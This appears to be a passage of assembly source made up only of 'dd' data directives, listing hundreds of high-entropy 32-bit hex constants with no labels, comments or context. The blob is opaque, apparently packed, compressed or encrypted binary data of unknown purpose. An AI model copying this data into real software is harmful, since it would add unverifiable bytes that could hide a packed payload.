dd 0AAD29084h, 9BF60752h, 2D383808h, 56F92218h, 6244F8BEh
dd 0F9EC8A36h, 0B48E8FCEh, 13284CDCh, 417A258h, 81D70992h
dd 16E9CF9Ch, 2AF5E47Dh, 0AC4626h, 4E096C2Dh, 1AA26221h
dd 0D8F4243Eh, 4D94BF70h, 42182805h, 2A6602B7h, 0B102AAB1h
dd 6B9FB2Fh, 0B5445717h, 9C679206h, 0CA462B4Ch, 20042A10h
dd 2408194Ah, 54125024h, 32C59016h, 0F6EE0D81h, 0BF553243h
dd 8FBDD0A9h, 194796BBh, 0ACBA629Dh, 30ABC902h, 42FAA44Dh
dd 515EF147h, 0E280BEB8h, 3593B150h, 6A1C85CFh, 780BE18Ch
dd 66652340h, 30B661CBh, 1A920E88h, 0F1253433h, 0E8482E20h
dd 7F90C3B4h, 0ECBAF84Ch, 2AE4BE0Ch, 0D814E247h, 28553A8Eh
dd 14224ACFh, 60080F68h, 85921D9Bh, 0E3183192h, 31752A9Eh
dd 722480E8h, 8EA9174h, 0C5F29315h, 7F2089F4h, 0BF3D106h
dd 0E7914963h, 7DD984B8h, 0F654C756h, 1C205DCCh, 0FCAA37C8h
dd 2E3C9E2Fh, 9FDBB0A8h, 0BCB13159h, 0ACDA09C0h, 535C5957h
dd 12C1922Dh, 2479E840h, 9441110Bh, 0EE831204h, 4D351202h
dd 0F91B6A60h, 91887F62h, 9481D680h, 0C021BA54h, 0CAC90331h
dd 0C582A024h, 9287CDBAh, 173855CFh, 76CF010Bh, 0D9FB6513h
dd 0D8DFD248h, 0C0BF3D12h, 0D51D7B2Fh, 7BFABEF2h, 800C0C5h
dd 0E0B314Dh, 0AC5FBB69h, 0CA98B633h, 0D22F5E46h, 9B594BEFh
dd 0EBC5D685h, 0E74CC220h, 0DAA0A25Ah, 2C02BCA6h, 2AB2CBBDh
dd 4A1299A6h, 0C8C6C662h, 97CA2ACBh, 0F1D96656h, 33F8EAC2h
dd 69147C66h, 7DE2D228h, 0F19965FCh, 0F958E6C2h, 24498351h
dd 799618CDh, 3520D184h, 8DB44463h, 3033CC43h, 473C1D66h
dd 5271BF57h, 28DC163Eh, 28E194E3h, 0CFA22690h, 0F73A5E84h
dd 45B6D1E1h, 477CBCCh, 221C2949h, 918DE23Dh, 82A63575h
dd 4E8F972Bh, 7FE8FD69h, 0F27101C7h, 770818D5h, 42213302h
dd 33D82006h, 158F86Ah, 0E0E2D4D3h, 978B3E53h, 3BFC2E84h
dd 0C523FA25h, 8AAE6F4Fh, 0CD4E70BEh, 9DE77827h, 0BEC36AE4h
dd 0D431626Fh, 0A5E2BF75h, 851982FDh, 0D2BBF804h, 0F65169A5h
dd 0F8D9F037h, 77FEB23Ah, 8201E47Ah, 0F27E15DAh, 2F62A0A2h
dd 3574D60Ch, 7174ED10h, 0E48D626h, 0F76E8D2Bh, 0B30CA960h
dd 427486BCh, 19C14217h, 0FD3110C1h, 8AE6FCAAh, 561BB1C8h
dd 0B3C59076h, 0B0CB51DCh, 0A02B8A52h, 42625FFh, 1B0C1114h
dd 7E2907CBh, 0C8DA9FB3h, 50621953h, 9224D1B1h, 217D7B03h
dd 52771F87h, 0AC2FEC49h, 4B1B81FCh, 0CEFE1DE4h, 2D83488h
dd 13042A7Fh, 31A5777Bh, 4F52118Ah, 0E97E131Bh, 0E6803BB9h
dd 0A1875145h, 5DAE622Ch, 40FE8FFDh, 0FC8F7155h, 0F6F587E1h
dd 9F4ECD15h, 4431C998h, 0C95988EAh, 0E12C2382h, 5217FA37h
dd 0E22DC7E0h, 0A108CF2Dh, 4BCE8159h, 594FDB37h, 57D6F24Eh
dd 288E2E9Dh, 18B0E56Ch, 34605D66h, 9BE70862h, 32AC80F4h
dd 0E5A2324Ah, 0FBC16365h, 8DD77349h, 0CC2FA8C7h, 94045292h
dd 41CE2D98h, 42A84BA7h, 0E2911CF4h, 0E4BBFF6Bh, 2729B785h
dd 4577055Fh, 15E454EEh, 41A83857h, 0C099F8B5h, 1D28E5CAh
dd 9CFB993Dh, 0AA88FE0Eh, 99702A62h, 27532904h, 1D243D77h
dd 0F720AAEh, 4CCE14FBh, 607AAA92h, 0E341F8C4h, 658CFBD5h
dd 27D3015h, 815C3D9h, 0D510E290h, 52ACAE7Ah, 5A25F8Dh
dd 0B5EE0B1Eh, 17DE4B13h, 642431F1h, 3D75F600h, 18C22789h
dd 12BFD6A0h, 50178250h, 0BFC26F55h, 0CD856AD8h, 0A88CBB8Eh
dd 0A84D30F9h, 0E2C05C22h, 1269ACAEh, 9743D5C8h, 549A5803h
dd 792491ADh, 0A57CCE37h, 0B7999C31h, 0F2A7F4AAh, 0C0A300Ah
dd 8867B619h, 0AEE74256h, 119BE82h, 0C4A61C12h, 260D4252h
dd 45B70AEBh, 0D2918011h, 8866688Dh, 2A543905h, 334BF9CCh
dd 0E72BB60Eh, 690CE35Ch, 8302F8DEh, 128A0618h, 0D33D6E44h
dd 152A278Bh, 59B11851h, 24A89EB9h, 0DF16DCA8h, 0A2F7092h
dd 6E058EE9h, 1417759Eh, 5C606BD7h, 1EB2760Dh, 0ED1037A3h
dd 5896C10h, 2EF5F4h, 2209D738h, 43AA5807h, 0B57790C6h
dd 7B21A258h, 0A0101558h, 26B9F858h, 2BA88786h, 0F9812490h
dd 262CE11Fh, 0D95E3DA3h, 8C822736h, 0C5F01157h, 0A5983543h
dd 4160ED66h, 42CADC00h, 50BDE704h, 1B44EBD7h, 0E2EA2E71h
dd 0A376415Dh, 332C962Fh, 0B446B328h, 81C62950h, 0F17A1942h
dd 5F4960AEh, 6412F4E1h, 625BB36Ah, 0C577518Bh, 0D7DB3139h
dd 0BC4B3D52h, 639962Bh, 304BA62Fh, 0CE33C06Bh, 962014CCh
dd 8781BA0Eh, 0A8CF0D28h, 208B4EB4h, 1BB4C76Bh, 5FF1454Bh
dd 0FF931F7Ch, 0A9BD9E03h, 0F07CA807h, 8050A0A9h, 0F12CC7Fh
dd 84FD492Ch, 753020C0h, 1EC259Ch, 204208Bh, 0C97FC8F0h
dd 7C19D04h, 0C9DF2FA2h, 0CE8764EBh, 0DBF1993h, 26D29879h
dd 32CAFB36h, 2322A0C9h, 0C4D5ADF0h, 0E0941ED1h, 0BD249906h
dd 2AF9902Bh, 1D622322h, 719B3464h, 0FF90EC80h, 0BFAFE010h
dd 973887E3h, 0D25EE066h, 0A8C762BAh, 80A73420h, 371551CBh
dd 9C63F481h, 0A976D6D6h, 9882A959h, 844C63B7h, 8F0CB178h
dd 1E464E31h, 638B309Ah, 334863A6h, 0F1B34C82h, 67CFF9C1h
dd 0AE33701Bh, 1FC34041h, 0D6E1E6F0h, 14B119EFh, 269AA2DCh
dd 645478C6h, 0F2A9D7C9h, 50C2D8B3h, 87ABA145h, 5A907A8Ch
dd 454EB33Dh, 0D56425F2h, 0A9305CC2h, 616774Ch, 25BC13D9h
dd 18D1840Dh, 30305FA4h, 5BA124E8h, 685E341Fh, 3FA50A41h
dd 92520A9Ah, 0CB79A074h, 862B1237h, 617F4945h, 0B637B7F6h
dd 0E2B98E57h, 89CEF05Dh, 0DDF12AB0h, 372F5012h, 5D62F938h
dd 0A91F7808h, 71F0189Ch, 0A28DD822h, 0A110A11Ch, 56CC55B1h
dd 0F616AFB1h, 0EEA09D33h, 0D1986341h, 46316547h, 0C4190E9Fh
dd 55D82B4Ah, 58A77495h, 0BEAB3681h, 0C09B4DDBh, 0DA298208h
dd 0BB452AE5h, 0A10933C0h, 951760F5h, 2ACCCCD9h, 83C6D937h
dd 622C1770h, 2356D1E8h, 0DB43C881h, 69A6D291h, 0D0C95452h
dd 67DB9054h, 0B30FF452h, 0D24855DAh, 66281201h, 2CEE71C0h
dd 0A4C0A5CBh, 8AAA0A0Ch, 0C6F21065h, 9F6049E8h, 0DA213124h
dd 0CDA339A9h, 1D2D0CA3h, 0EECA7558h, 63608998h, 88F34A4Eh
dd 7131B411h, 1BD596C0h, 810248A2h, 0AC01CB0Dh, 1BD34096h
dd 590D6CCDh, 499A25C0h, 4AB5B127h, 2B348C1h, 5BC31527h
dd 0BC3271DAh, 0B17F4A08h, 0D3089204h, 32E68538h, 0AD0CD96Ah
dd 1FF593C4h, 4AC5E9A3h, 0C6254D5Fh, 638C3119h, 0D4ABF2EAh
dd 754E0893h, 62D16D74h, 5EB9D508h, 9569E942h, 0C2B45B04h
dd 9B563717h, 53CE2573h, 4591491Ah, 0F11D657Eh, 0DE4FB58Ah
dd 0AE6EACB6h, 98EF20AAh, 0BBDBB4CFh, 57D36612h, 8F25E504h
dd 26D471EEh, 0E511EA6h, 0C14A4577h, 0CCD95F4Dh, 3F19C238h
dd 0A65C663h, 66CC34CAh, 6D53A8CDh, 36F80290h, 930D2446h
dd 8BB13C8Ch, 0C6D19D8Ch, 0C2597512h, 0D28CD230h, 0D7046666h
dd 0C4582C5Fh, 222C4768h, 0B073E401h, 38B5C9C4h, 26BE2BE9h
dd 178FF19Bh, 0F45EC1EDh
dd 6065B320h, 952BD50Ah, 26FF2609h, 0BACF4631h, 329CAA80h
dd 806495DCh, 0CF8C5747h, 98AF1746h, 808B6317h, 0D2F7A5F1h
dd 92204457h, 0F70179FFh, 458D429Bh, 0F65BA95Fh, 4317A1FBh
dd 68D0B0FDh, 5011C629h, 0F46030E8h, 0CD1C28C9h, 23A5677Fh
dd 2D3425A8h, 51FF0C65h, 0C916499Bh, 0ACB585CAh, 307A31F0h
dd 44C6E44h, 0F44742B6h, 0B4512FD8h, 19BF17CFh, 8B16A881h
dd 0C1E3D60Bh, 0DFAF0986h, 8F8501DCh, 38086CAEh, 19F595E0h
dd 4CA2E14Bh, 0F4E07D38h, 0E786FF15h, 8700CAB2h, 0A7E16h
dd 0E7E85F70h, 0C2D55D40h, 32EAAEE6h, 0A4501577h, 0EF57173Bh
dd 93F301C0h, 0B0BACF7Fh, 0BA50BFC2h, 2E0BC4A8h, 254077F0h
dd 0E0A2A71Eh, 8E2D824Eh, 7412D74h, 3AE29751h, 2555107Ch
dd 8AAB666Ah, 959AFA49h, 0B281FC89h, 6731981Bh, 77C57278h
dd 0C7096AABh, 9166CE08h, 0BBDA947Fh, 1ADF62F6h, 78A9B610h
dd 81EC0E64h, 0AA6A5577h, 0F8C562CBh, 5DE0FB06h, 2BBCA471h
dd 1B62248Ch, 0B0860D3Eh, 7780E729h, 0C9912EA5h, 7596B5B9h
dd 71AA81ABh, 5695F664h, 4A8A8BC7h, 64186626h, 4D1AD746h
dd 983E9C6Ch, 0D6D50974h, 366C2E86h, 5EA33852h, 32A15C19h
dd 5D2A664Eh, 461CB962h, 48112AA8h, 0DCBF62AFh, 0AB87919Eh
dd 10955562h, 9554D97Ch, 0B3173B6h, 270C1625h, 5079B3DCh
dd 0E0187560h, 0FC873F1Dh, 6EF1576Ch, 31B4E161h, 940A6743h
dd 921188C4h, 9DC1558Dh, 0CC627982h, 6FDBF23Fh, 2CCE0AFCh
dd 0E8568B90h, 681F917h, 4A8202FAh, 31F471D1h, 0C26F0781h
dd 0CE2A604Ah, 68C1D2DDh, 1685CFB8h, 0C55E65FEh, 39067E59h
dd 0AF95621Ch, 0B3F7ACEFh, 0E2A9A539h, 9FFEF3D2h, 8662BFE9h
dd 60D1737Dh, 525721B4h, 2DA0018Ah, 86E0E8D6h, 0B2053315h
dd 19A85500h, 1954C1C4h, 482A026Dh, 0C32C608Ch, 48735F3Ch
dd 1883EA81h, 0CD691048h, 62B2A210h, 33FB7E9Bh, 0DF4AE395h
dd 5D214EB2h, 1FF8B8B0h, 0E5EB146Ch, 8A33ADF3h, 0A8F38133h
dd 3FDC1341h, 0B89DB098h, 0FC3F9E2Ah, 7FBB1F9Fh, 0C5180565h
dd 0A18204BDh, 50864C4Fh, 0FB548CA4h, 0B1313DA7h, 928B453h
dd 12AA660Ah, 322AB324h, 2333CB5Bh, 3CABEE2Fh, 0ABD922BEh
dd 26484C8Ah, 0F1D1845Fh, 264BA43h, 6284D5E1h, 0F48C6576h
dd 7525F8ACh, 0CA9B8EB5h, 24305259h, 5F41AF0Dh, 0B985AF15h
dd 4C0FC963h, 54BFFCE6h, 382AED8Ch, 168ED1DAh, 827C6C61h
dd 4C9002BFh, 0BF05C636h, 0E1C1DC25h, 8B1A6F9Ah, 2AB67174h
dd 182FEF54h, 57F183A5h, 0F3F333E9h, 6B6F7C3Ah, 1CE42F57h
dd 5221DB1Eh, 0C28B6B4h, 4C6D0019h, 0B92602B0h, 0EFC7E221h
dd 27B538BBh, 0AB54FA82h, 7D96FAF3h, 36B21E60h, 42A9052Dh
dd 162D00F5h, 5CAA537Ah, 96C00041h, 0AE3FD580h, 9B458592h
dd 704A1103h, 84937DA0h, 0A862DBAAh, 0AE001748h, 4AC06986h
dd 0AD083958h, 5B628144h, 5505140Dh, 2A450516h, 50DADC6Eh
dd 950BC0DEh, 0F211F5CEh, 7311A028h, 6811AF09h, 0F147AF89h
dd 9113310Ah, 1AD02E6h, 20812184h, 124C8711h, 6300CC23h
dd 2B00CE23h, 1073D870h, 0A194B871h, 0D4232B80h, 358860B8h
dd 68C6613h, 8133D9C6h, 0A44C0236h, 6A13088Dh, 0DAC6C423h
dd 0C21B3188h, 0E21B188Bh, 23604CBh, 888D44CEh, 0D823E133h
dd 3688BC4Ch, 0B6017013h, 99FFCC78h, 48A08ED4h, 209DCBCh
dd 0A8C14CF4h, 0B329503h, 7C9E38C6h, 36C8FA31h, 6A08B896h
dd 985F696Ch, 8938A309h, 89E2FADAh, 0A86F7E50h, 0BE77BF12h
dd 3BF1F2A4h, 0ECF48EEBh, 53E13545h, 9EE8FF8Ah, 0D7134774h
dd 86BF1F07h, 0B66729E2h, 0DE605147h, 4F8CDB2Fh, 23EE09h
dd 8EC21811h, 3E3983EFh, 72E5FFB3h, 4D45332Bh, 1B0090BFh
dd 21F5DA15h, 0AE117C6Bh, 41A66A47h, 2748C1F7h, 0F9C17D66h
dd 0A1C85FEDh, 7CD13B01h, 0D84480F0h, 0D1F4829Eh, 5AE22FEBh
dd 64E0FA0Bh, 0EBC6215Bh, 3C0FF8E3h, 0E4FDA0CFh, 0E6C08720h
dd 0B05C133Fh, 5D149FCCh, 0C834316Ch, 7CF8CF2Fh, 0AB42C420h
dd 0A02A9F58h, 0B30E117Ah, 98961965h, 958732CDh, 8C488A66h
dd 8C76AED1h, 18567C6Eh, 828CD1C7h, 803D9C34h, 0B16C88D1h
dd 16DDF5C5h, 0FED106E0h, 13A21209h, 69393F93h, 28CEE40Ch
dd 0B31C7176h, 24250F84h, 0F4442316h, 0AC51E5F4h, 6C04BAB2h
dd 0F3E09EEBh, 8460F267h, 0A17CFA8Fh, 827C3A43h, 0D3D6A623h
dd 0B37F9631h, 9E31061Ch, 31D01125h, 544A981Ch, 0A04C6478h
dd 3F4500B1h, 60C9FF52h, 78261193h, 4AA2B2C6h, 313418D4h
dd 0F4CBA082h, 9F99520Bh, 0BF59D70Bh, 7F2F549h, 0CACDD452h
dd 8FCD89FEh, 627838BFh, 3AE058Ch, 618B63F8h, 44F75DA4h
dd 340F6CA8h, 9E618C4Dh, 0C4888C6Bh, 5D88C214h, 0D1C38950h
dd 57A8104h, 2C43F723h, 0FCCD24FEh, 0BD112768h, 8E6C7167h
dd 7995EE6Ch, 7FE6CD20h, 0E18FA208h, 4099C46Dh, 2C603162h
dd 2486AABAh, 4C925C86h, 0A806302Fh, 33DDB90Ah, 0D96EE7A2h
dd 797491D7h, 624C0BB1h, 80BF98B0h, 8998AF34h, 0F698C9FBh
dd 579B00Ch, 0D1EA6A5h, 0AF5E4072h, 40C88961h, 0A07F80A7h
dd 0D6032C7Ah, 12BAB89Fh, 60DA7C62h, 594E3118h, 7697669Ch
dd 2B28CA21h, 79F8D9A5h, 267F88C7h, 0DDA468E5h, 3988685Fh
dd 207E71A3h, 68EDA071h, 0BB2C9108h, 2CD988Fh, 476A14CDh
dd 0EC981CB3h, 0D1D7DD9h, 8199D92Dh, 531B8C53h, 3CABB2FBh
dd 1A37E11Ah, 89A31844h, 6D30458Ch, 3B52B74Bh, 0B071359Ah
dd 24D9D80Fh, 0ACCC0063h, 0BFE1CDFFh, 68ED3440h, 634DA41Eh
dd 49359B85h, 2625BFB3h, 0A857812Bh, 80104174h, 8103152Ah
dd 0F1E25963h, 0F8B518AFh, 11B27AE1h, 7ACB09A8h, 696688C2h
dd 3066D9D9h, 94653299h, 0B1E10063h, 6D1B8C84h, 9E70693Fh
dd 0B1C28CAFh, 736514EBh, 69A33469h, 4FF09BE4h, 0E76819A8h
dd 0B1C3779Fh, 34EFA0FCh, 0BB467FDAh, 64D1D9BEh, 62A108D2h
dd 46D281CDh, 85DA8596h, 26633425h, 2799B11Ah, 0B12825D5h
dd 0D346A4A1h, 89FC9B18h, 0E29109D7h, 0D1B9CA97h, 0D3ECFD24h
dd 3A180401h, 18984D70h, 8D789EDh, 0A50681Fh, 0A90939A3h
dd 0AA259134h, 0A2E64B12h, 68C15049h, 991F68D8h, 4554492Dh
dd 83441A2Eh, 0E925906Ah, 50C14345h, 0A8CAC734h, 0C66558D1h
dd 668DF5CAh, 3B4C5A2Ah, 58529856h, 1039520Ch, 601502BDh
dd 0E8148E34h, 58F35EDh, 277C69C0h, 61524FD6h, 2774DD34h
dd 99B12A6h, 1033D337h, 6CB7C472h, 0B233901Eh, 645EEAD1h
dd 0D128AE34h, 0CEB1AF6Bh, 9E67CA88h, 5186F960h, 89F365BCh
dd 635C9099h, 9A2CE6D1h, 342E1947h, 81CB6B2h, 0E5D38AA4h
dd 34EC89FAh, 8CCB6506h, 192EB45Dh, 31C29C18h, 6F220004h
dd 534359h, 0A8EC6D18h, 0B4CFEB69h, 23E7075Fh, 8598A6E9h
dd 9B5B785Ah, 0A307D2BEh, 0B1A237EDh, 4364519h, 98952AF8h
dd 0A16484ADh, 0AD092802h, 228A68A9h, 0B6245B12h, 588D5A12h
dd 94264532h, 0AA34044Ch, 1BF9E4B8h, 588DB132h, 9823455Ah
dd 0A7083446h, 0DA104F11h, 4C22D444h, 4A08990Ch, 122E9940h
dd 22498E48h, 908B9501h, 827F174Ah, 24FB927Ch, 0A2765213h
dd 8950846Ah, 27463B7Eh, 884746A4h, 0FF4811AAh, 0C8950D7Bh
dd 2277A5FBh, 9099012Ah, 0A6119533h, 0F9A5CC4Fh, 88FDF452h
dd 0DBD347B9h, 264C604Ch, 0BE5850B2h, 8C592C08h, 2A53112Ch
dd 4765059Ah, 34A76F90h
dd 0D6253B16h, 0C4A356C7h, 2BCAD8FAh, 0A3696256h, 0A17985B1h
dd 1C7A8161h, 57174F27h, 3D98AF5Ch, 0A32B946Ch, 0D212178Fh
dd 240E7E88h, 0D1684F13h, 2A0397C9h, 5DA4FDE5h, 0CA91D487h
dd 44272498h, 20638926h, 485A698Dh, 0A18B61D3h, 0A541050Ch
dd 0D27E624h, 193C5F7Ch, 0A6880A54h, 29E66929h, 691BD305h
dd 86932FFDh, 8612A209h, 91842709h, 4E129E23h, 0A801A789h
dd 0A467529Ch, 494F1A4Dh, 0C4691A42h, 90C649A4h, 919E19E6h
dd 770D9266h, 0A7F8AE28h, 494A2234h, 0BA28D4Ch, 98644D29h
dd 916B3834h, 2A08617Fh, 0AA1A691Bh, 114CC4D0h, 29C2F950h
dd 0F3400CA9h, 4FA653C4h, 52FD99A4h, 0B4885654h, 4CDCEB47h
dd 0A726FD68h, 65A6E4D4h, 0D089919Ah, 0F4EA45F2h, 0E7AC6C91h
dd 4CD28A6h, 21338FDBh, 7042A267h, 0C84C988Dh, 7A3DE88Dh
dd 3C79E626h, 99CC5FFCh, 62811390h, 0CC6C4CF4h, 0C7D3726Ah
dd 3DAB14BEh, 23CABA45h, 0D227ECD2h, 0CD96D534h, 53484CEDh
dd 0C0A2CA3Ch, 6CD2D912h, 3348E348h, 88985CD2h, 49D311A3h
dd 0D2060933h, 4C6948D8h, 2C74A1Ah, 8D916348h, 60E93634h
dd 2A8E84B1h, 449D4469h, 51A42631h, 2469750Ch, 0B97A98Ah
dd 0C4822BAAh, 63CA9940h, 8042EC45h, 941C50EAh, 6EC270ACh
dd 0AF5E1632h, 638E64F0h, 0F75967D0h, 0B7CEE01h, 0E80BA080h
dd 45170883h, 4315E44h, 6EF0BC5h, 7599F96Ah, 23C6C71Ah
dd 6561C916h, 0A771A189h, 0F0C7B3B1h, 9D388EDBh, 813358D3h
dd 0FD1D3DEFh, 4FBBEB2Ch, 0DFF6869Bh, 0DECC1F81h, 3429EEE4h
dd 47C535D2h, 0A9310D42h, 2369FD67h, 840F83AFh, 0FE1E518h
dd 0C06E0D9Ch, 4EF913E8h, 3B678C58h, 99F9718Dh, 0E967C54Bh
dd 0DE23645Bh, 0C2759934h, 5B79F611h, 384F1646h, 0E1610FC6h
dd 0E5DA32C8h, 0DCB2D027h, 1C8BD0C1h, 0BCAC3ECCh, 8133245Dh
dd 1374A3F6h, 88D748D4h, 88DA133Ah, 2264842Fh, 23B404CDh
dd 44C84143h, 511A099Ah, 504D8265h, 0C91A2899h, 1581C9AFh
dd 3BCDA899h, 0D412A68Dh, 0AA8842B8h, 43514611h, 4CD3982Dh
dd 6A214350h, 191EE612h, 2489240Ah, 93854813h, 8B5D9105h
dd 901BA288h, 454CD4B1h, 5E5D82CEh, 6414C493h, 682ED260h
dd 22284186h, 0C83C3EA6h, 300EE37Dh, 89411DA6h, 3EAC5479h
dd 19084329h, 2165E68Ah, 0EA6C7D96h, 0F562C22Fh, 2002223Fh
dd 0B3F58A5Ah, 0FAA0818Ch, 7761BDEAh, 9870ECF1h, 968FA3DCh
dd 9BAA7CB1h, 8BCAA695h, 2A836BF5h, 1340260Dh, 3F9250D6h
dd 284AFF31h, 0F6538661h, 6959589Dh, 3C4D127Eh, 6D9A525Fh
dd 0CDF5398Bh, 0E2259584h, 9F97890Ah, 6B2D8FE0h, 71148DC0h
dd 0FFADB675h, 0D29EDF68h, 0D984222Ch, 66413495h, 239CCCE2h
dd 0C0B7309Ah, 0EB384339h, 571909A1h, 38FCD286h, 0A43394E7h
dd 243630A8h, 6C0A2EE3h, 0BE0F618Fh, 0DC6073E0h, 8D2B2186h
dd 2928A1B2h, 0C8BDBF4Eh, 7FF2D4C4h, 4D13694Ch, 697EA08Ch
dd 92309FFh, 0A309695Fh, 32584711h, 4C90F4A1h, 531F9958h
dd 9124255Ch, 177F5A80h, 0A50BA409h, 0D30FE67Dh, 4A142CAAh
dd 8C6DAA7Fh, 1A2EC7E9h, 0C596C6DFh, 4A111CA5h, 0D3869CCCh
dd 0A14E2608h, 0A2892F89h, 5AD28EF4h, 0C84F54A6h, 8A5A8414h
dd 89274218h, 0CD625204h, 0C3229A84h, 88F67D39h, 94D986A1h
dd 91B8B11Dh, 36ECD94Ch, 49CF1B75h, 46105327h, 0A3483517h
dd 7B6A2532h, 0CB606E35h, 9D7CDB14h, 5C78BC5Bh, 4BCDAC25h
dd 0DB2210ECh, 5612EB3Ch, 2845DD1Ah, 5712AE25h, 1E462B09h
dd 0F2809426h, 0E4E85C6Ah, 1132D216h, 4FEAB235h, 1113339Ch
dd 692A4235h, 23880F41h, 6A82690Bh, 4C26D544h, 4C8C7D30h
dd 47279928h, 128C252Ch, 73AD0947h, 92CB253Ch, 32488234h
dd 1A400ED3h, 0B68DAB48h, 36CD4375h, 4A9C2595h, 9822579Ah
dd 0D211FF5Ch, 0A4038140h, 0A15EFBD3h, 0F8D18E13h, 0C4A5539Fh
dd 38A5F58Ah, 73AE184Ah, 0BE4CD3B3h, 0A6712849h, 5300F9E9h
dd 0BF184BA7h, 0F6508B70h, 1894C7B3h, 0D458992Dh, 0BA78FCBEh
dd 0C3A13B94h, 0A133FA3Dh, 16F323F6h, 3DF358F0h, 4A6ADF53h
dd 899F2297h, 0DA841335h, 602F0229h, 4D28CD62h, 8A342DA2h
dd 278737D0h, 71A5E137h, 0FB131E94h, 8D3C068Dh, 0E45EFA80h
dd 7A4B44C4h, 1A90945Ch, 13274694h, 22F9F4Eh, 0B462899Fh
dd 50E74A39h, 9745719Ah, 8D28A51Dh, 0C1A2A523h, 5BB17935h
dd 0B518AD18h, 204C69AEh, 11239229h, 8B28CE6Fh, 4A370A10h
dd 0B763A54Fh, 0DBD2F7E2h, 54CCD8CEh, 35098F9Eh, 0D1644261h
dd 9C470F27h, 0D8BE5315h, 38A689ADh, 65085613h, 55D6D4B8h
dd 6AC2A49Fh, 47DFEC57h, 9C5C2572h, 23E38122h, 2A113A84h
dd 432DC0CAh, 348C9E2Ah, 309A90CEh, 14C0A601h, 4CFC67E1h
dd 63732613h, 1549117Ah, 348FF845h, 7DA8FC85h, 44CF4C91h
dd 5BF80994h, 49BFC114h, 0C9BF4535h, 0CF7E2517h, 9112C536h
dd 3E3A13D0h, 0D4B4C8A6h, 253E9F7Ah, 0D34D9F94h, 3EA59C58h
dd 8F8962C9h, 896DE133h, 0E60742F8h, 0CB248BA7h, 4538BE1Ah
dd 887FD7Ch, 0B715FCA5h, 0B12AC782h, 2B080A1Dh, 4362C23Bh
dd 264208D2h, 0D884130Dh, 64212029h, 0E862CC62h, 1B4AEA05h
dd 0BD222AD4h, 13296920h, 8472FB52h, 0B4EA8990h, 0E4EA189Ah
dd 6868228Bh, 5A05729Bh, 323609E8h, 0D6997B45h, 0E22754FBh
dd 229C04Ch, 23DCD42Dh, 0A7CC8F93h, 0C9E84591h, 6284022Dh
dd 0BCEBA96Ch, 0B6018250h, 2479234Bh, 0A739380Ah, 84775591h
dd 971551D7h, 0C4ABC783h, 90D60C5Eh, 75E14F6Dh, 52042C90h
dd 95F12BE2h, 0D40B52F0h, 56A12903h, 4916C491h, 0CC85EAD3h
dd 6A82F11Dh, 32408517h, 47DA6551h, 47528E12h, 476D7953h
dd 1F0B797Dh, 28A61E31h, 9F7D4138h, 99B4F56h, 89E6D336h
dd 36C444FAh, 0D2334532h, 16E67B68h, 0C771F621h, 0A2CB45D4h
dd 0C427A466h, 97B6517Ch, 0DCCB0784h, 0E02DD233h, 385C1FEDh
dd 160D5E54h, 284DC4AEh, 338890DAh, 45387701h, 44C99930h
dd 0D49D099Ch, 8AA38263h, 3D493438h, 8A23F762h, 0DCA2E925h
dd 472BB992h, 567ED58h, 6E828993h, 49EB6B22h, 0E22A133Dh
dd 2A2AB4F8h, 33A09CE8h, 6A23B7ADh, 0B91499D4h, 11EECA3Dh
dd 0C3E5C9FDh, 9D9CA2CAh, 9A82E133h, 0BD655312h, 0BC224A3Eh
dd 0A42B6176h, 29CE5F19h, 0F3C14D3Eh, 88BBEFA3h, 0CC55EECAh
dd 0E4699895h, 99B9730h, 229F1B6h, 0DA2644CAh, 0A35EB04Ch
dd 0AD48501Eh, 927CA222h, 9959BFA6h, 0D604823Bh, 6501AA2Eh
dd 8FF9CB22h, 22BE1C2Eh, 0C79FD0B1h, 0BEA07F14h, 4E239659h
dd 0A641F253h, 0F25C8FD6h, 65B01625h, 0D3F392B1h, 60EEBB60h
dd 0ECA2174Bh, 9E3D71FAh, 3C1C3DD1h, 0BBB24CBAh, 0CABA72A1h
dd 0D49DF2A2h, 0AA235813h, 0CA82D44Ch, 638D9D04h, 7A928DAh
dd 22BD30D5h, 269236AAh, 3B994AEEh, 2ED69F6Ah, 62657C92h
dd 0AA2684CBh, 0C422411Ch, 0D722AD43h, 769FE943h, 8E9F6ABh
dd 27DE792Ah, 37E69AEFh, 4D1B533h, 368B96D5h, 9704A5BDh
dd 0A42E783Ah, 8EC2C2D4h, 74018897h, 83D77E63h, 0A679ACB7h
dd 5C544453h, 0E423E125h, 2AF93A3Ch, 70C37314h, 0CA157B87h
dd 4C34B2F0h, 7A9F6990h, 8AB59960h, 9A4B7AC8h, 0EE663654h
dd 0BB5C2768h, 89967C08h, 0C88F132Eh, 0A48B0472h, 0EA97B517h
dd 7A2CE514h, 0B6020CD2h, 0A3D4BAA6h, 43C5F53Fh, 4E358F5h
dd 0A1CBA1CEh, 349DD4FCh
dd 0E9463190h, 501E99D3h, 8F10177Ah, 5500A9D3h, 3F0529FFh
dd 0BE41F8FCh, 0C3440AEDh, 1888E2EFh, 72BFE4B5h, 410100CCh
dd 991C11A8h, 30F156E0h, 8160307Eh, 1E17F57h, 5750E011h
dd 40794489h, 615B2A04h, 1B2D284Ah, 838A88D2h, 3A4D4809h
dd 70A332F0h, 740000A2h, 4280328Dh, 8CA1713Ch, 92469184h
dd 99814440h, 788F00A2h, 98B8E232h, 7E1B4E1h, 0B1B75D57h
dd 0F74BFD5h, 0C9FD1697h, 540F0EAEh, 65710CBAh, 978A553Eh
dd 7EA7426h, 7FE57F3h, 799C76F1h, 8FFC4A0Eh, 700D0F9Ch
dd 748C020Dh, 3D3C4940h, 3A102C1Eh, 5189D3D6h, 84182E79h
dd 52960127h, 3F42FD3Ch, 9022CAC3h, 25D7A983h, 0B0C277A8h
dd 1F82703Fh, 131ABC1Ch, 0D4560EA7h, 3378DA11h, 3A0DD8Bh
dd 0D0174758h, 3A7582B2h, 0C2B591DDh, 0C3D1067Bh, 0F977485Eh
dd 60360AFFh, 36FC9B8Fh, 954AE0FFh, 34B482Eh, 29C7ED26h
dd 2400C5CEh, 0CC4E2ED6h, 74BDC051h, 7C485542h, 0E7AEEFF0h
dd 0DD412334h, 5CE410BBh, 0C3BAFA87h, 0A07CDB97h, 0C68895F2h
dd 337C9008h, 0D30D680Ch, 0C1E422Fh, 2223D71Eh, 54D87468h
dd 6C4CA7A2h, 5D88D92Eh, 49D694B6h, 0A4671C3Fh, 5C862A4Bh
dd 8045F2B0h, 4AF458A7h, 215FBB71h, 1393EB81h, 4D9AAD4Fh
dd 21985193h, 98FF2176h, 0C3E9BE2Fh, 0F3BE43E8h, 0D68CF6C5h
